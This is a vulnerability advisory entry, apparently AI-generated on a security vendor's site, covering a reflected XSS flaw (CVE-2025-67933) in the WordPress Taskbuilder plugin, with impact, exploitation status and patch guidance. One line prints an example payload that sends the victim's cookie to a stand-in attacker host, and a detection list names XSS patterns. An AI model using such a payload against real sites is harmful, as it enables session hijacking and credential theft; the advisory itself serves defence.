
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67933 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WordPress Taskbuilder plugin, classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). It affects all versions of the Taskbuilder plugin up to and including 4.0.9, with version 5.0.0 being the first patched release. The vulnerability was reported by researcher Skalucy on October 23, 2025, and publicly disclosed by Patchstack on January 6, 2026, with the CVE record published on January 8, 2026. The CVSS v3.1 base score is 7.1 (High) as assessed by Patchstack (CNA), with no NVD enrichment provided (Patchstack).
The vulnerability is rooted in insufficient input sanitization and output encoding within the Taskbuilder WordPress plugin, allowing attacker-controlled input to be reflected back in the generated web page without proper neutralization (CWE-79). This is a Reflected XSS attack vector, meaning malicious JavaScript payloads are embedded in a crafted URL or request and executed in the victim's browser when they interact with the link. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — specifically, a privileged user must click a malicious link or visit a crafted page. No public proof-of-concept code has been identified at this time (Patchstack).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim user's browser session on the affected WordPress site. This can lead to session token theft, credential harvesting, unauthorized actions performed on behalf of the victim (such as administrative actions if an admin is targeted), and delivery of malicious redirects or advertisements to site visitors. The CVSS scope is marked as "Changed," indicating that the impact extends beyond the vulnerable component to the user's browser environment (Patchstack).
No active in-the-wild exploitation has been confirmed for CVE-2025-67933, and it is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. However, Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress plugins across thousands of sites regardless of traffic or popularity. No public exploit code or threat actor attribution has been identified (Patchstack).
https://target-site.com/?taskbuilder_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).<script>, %3Cscript%3E, javascript:, onerror=, onload=) in URL query strings.wp-content/plugins/taskbuilder/, which may indicate follow-on compromise after XSS-based session hijacking.The primary remediation is to update the Taskbuilder WordPress plugin to version 5.0.0 or later, which contains the fix for this vulnerability (Patchstack). For sites unable to update immediately, Patchstack has issued a virtual patching/mitigation rule available to Patchstack subscribers that blocks exploitation attempts without requiring a plugin update. As a general precaution, administrators should avoid clicking unsolicited links while logged into WordPress, and consider implementing a Web Application Firewall (WAF) to filter reflected XSS payloads.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."